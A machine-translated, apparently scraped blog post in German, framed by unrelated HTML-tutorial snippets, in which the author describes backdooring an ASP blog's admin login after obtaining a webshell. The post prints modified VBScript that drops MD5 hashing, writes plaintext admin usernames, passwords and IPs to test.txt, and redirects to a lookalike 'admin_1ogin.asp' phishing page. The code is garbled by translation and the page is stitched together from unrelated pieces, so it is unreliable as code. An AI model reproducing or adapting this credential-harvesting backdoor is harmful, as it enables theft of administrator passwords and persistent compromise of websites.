Empfohlen: HTML Code Writing Collection HTML ist eine Hypertext -Markup -Sprache (HypertextMarkuplanguage), auch als Web -Websprache bezeichnet, ist erforderlich, um sie auf Webseiten zu verstehen. Obwohl es jetzt viele Tools gibt, um Webseiten wie Dreamwvear, FrontPage usw. herzustellen, können Sie tatsächlich schöne Webseiten erstellen, ohne diese Codes zu verstehen. . . Da HTML -Inhalte zahlreich sind, sind nur wenige Menschen bereit, Code zu schreiben, um Webseiten (INE -Effizienz) zu erstellen, und die meisten von ihnen verwenden
In einer Sicherheitsprüfung habe ich tatsächlich die Webshell bekommen, aber ich brauche auch den Sozialarbeiter, um andere Informationen in seiner E -Mail -Adresse zu haben, also muss ich seine Gewohnheiten kennen.
Die Datenbank wurde heruntergeladen, das MD5 -Passwort konnte jedoch nicht entschlüsselt werden. Leider müssen Sie nur sein Login Administrator -Konto -Passwort aufzeichnen!
Speichern Sie die Mühe, das Problem loszuwerden!
Dieses Passwort ist tatsächlich wichtig, aber nicht wichtig.
Weil viele Leute das gleiche Passwort verwenden. Selbst Sicherheitsdetektoren wie ich sind zwangsläufig die Gewohnheit, dasselbe Kontokennwort zu verwenden.
Schauen Sie sich zunächst seinen Hintergrund -Anmeldecode an
<%
Dimem Login
Setzen Sie Login = New Adlogin
Login.execute
Klasse Adlogin
Private Exommcls
Private sub class_initialize
Setze commccls = new Commoncls
Exommcls.issipallow
Exommcls.Checkinstall
Exommcls.getConfigcache (*)
Ende sub
Private sub class_terate
Setzen Sie exommcls = nichts
Ende sub
Öffentliche Unterausführung
Dunkle Aktion
Aktion = Anfrage (Aktion)
Wählen Sie Fallmaßnahmen aus
Case Checklogin
Checklogin
Fall Loginout
Loginout
Fall sonst
Loginf
Ende auswählen
Ende sub
Privates Sub -Checklogin
Dim Adname, ADPWD, CheckCode
Adname = exommcls.g (trim (request (adname)))
ADPWD = MD5 (Trim (Anfrage (ADPWD)))
Checkcode = exommcls.g (request (checkcode))
Wenn Trim (checkCode) <> Sitzung (ExcheckCode) und Anwendung (SN & ISCSCECKCODE) = Ja, dann dann
Exommcls.showsg Verification Code ist falsch! , Application (sn & blogurl) & admin_login.asp
Beenden sub
Ende wenn
Wenn Trim (adname) = cstr (application (sn & adname)) und trim (adpwd) = cstr (application (sn & adpwd)) dann dann
Response.cookies (md5 (sn)) (adname) = adname
Antwort.cookies (MD5 (SN)) (ADPWD) = ADPWD
Sitzung (Adlogin) = MD5 (SN)
Exommcls.getConfigcache (*)
Exommcls.getClasscache ()
Antwort.Redirect (Anwendung (SN & Blogurl) & admin_index.asp)
Anders
Exommcls.showsg -Konto oder Passwort ist falsch, Anwendung (SN & Blogurl) & admin_login.asp
Ende wenn
Ende sub
Privates Unteranmeldung
Antwort.cookies (MD5 (SN)) (Adname) =
Response.cookies (md5 (sn)) (adpwd) =
Sitzung.abandon ()
Exommcls.showsg erfolgreich angemeldet, application (sn & blogurl) & index.asp
Ende sub
Private sub loginf
%>
Schauen Sie sich den folgenden Code an
Adname = exommcls.g (trim (request (adname)))
ADPWD = MD5 (Trim (Anfrage (ADPWD)))
--- Die Bedeutung ist sehr einfach, daher erkläre ich sie hier nicht explizit. Es hängt hauptsächlich von MD5 ab. Wenn das Passwort mit MD5 verschlüsselt wird, ist das von uns aufgezeichnete Passwort nutzlos und es ist immer noch MD5. Also
Also dachte ich an eine Angelmethode. Die ursprüngliche Anmeldeschnittstelle ist
Privates Sub -Checklogin
Dim Adname, ADPWD, CheckCode, Strlogtext, IP, ff
Adname = exommcls.g (trim (request (adname)))
ADPWD = (TRIM (Request (ADPWD)))
Checkcode = exommcls.g (request (checkcode))
Strlogfile = test.txt
IP = Request (IP)
StrloGext = StrlogText & Adname & ---- & ADPWD & ----- IP: & IP & (Remote_Host)
Setzen Sie f = server.createObject (scripting.FilesSystemObject)
Setzen Sie ff = f.opentextfile (server.mapath (.) &/& strlogfile, 8, true, 0)
FF.WriteLine (CHR (13)+CHR (10) & StrlogText)
ff.close
Setzen Sie ff = nichts
Setzen Sie f = nichts
Wenn Trim (checkCode) <> Sitzung (ExcheckCode) und Anwendung (SN & ISCSCECKCODE) = Ja, dann dann
Exommcls.showsg Verification Code ist falsch! , Application (sn & blogurl) & admin_1ogin.asp
Beenden sub
Ende wenn
Wenn Trim (adname) = cstr (application (sn & adname)) und trim (adpwd) = cstr (application (sn & adpwd)) dann dann
Response.cookies (md5 (sn)) (adname) = adname
Response.cookies ((sn)) (ADPWD) = ADPWD
Sitzung (Adlogin) = MD5 (SN)
Exommcls.getConfigcache (*)
Exommcls.getClasscache ()
Antwort.Redirect (Anwendung (SN & Blogurl) & admin_1ogin.asp)
Anders
Exommcls.showsg -Konto oder Passwort ist falsch, Anwendung (SN & Blogurl) & admin_1ogin.asp
Ende wenn
Ende sub
Sehen oder nicht,
a = Die ursprüngliche Anmeldeseite wurde jetzt durch eine Phishing -Seite ersetzt
B = Die ursprüngliche Anmeldeseite (admin_login.asp) wird an admin_1ogin.asp modifiziert
Warum?
Original: ADPWD = MD5 (Trim (Anfrage (ADPWD)))
Antwort.cookies (MD5 (SN)) (ADPWD) = ADPWD
Überarbeiten
ADPWD = (TRIM (Request (ADPWD)))
Response.cookies ((sn)) (ADPWD) = ADPWD
MD5 entfernen. . Diese verwirrende Methode wird seit langem verwendet! . .
Kein technischer Inhalt. Bitte lache mich nicht aus! Passwort wird auf test.txt aufgezeichnet
Anteil: Highlights von Kopfelementen HTML -Dokumente bestehen aus zwei Teilen: Kopf (Thementeil, im Allgemeinen unsichtbar) und Körper (der Körperteil, im Browser sichtbar). Mit der Beliebtheit visueller Webeditoren wie FrontPage und Dreamweaver (DW) ist es kein Traum mehr, eine professionelle Webseite zu machen, ohne HTML zu verstehen. Diese Homepage -Erstellungstools können jedoch nicht verwendet werden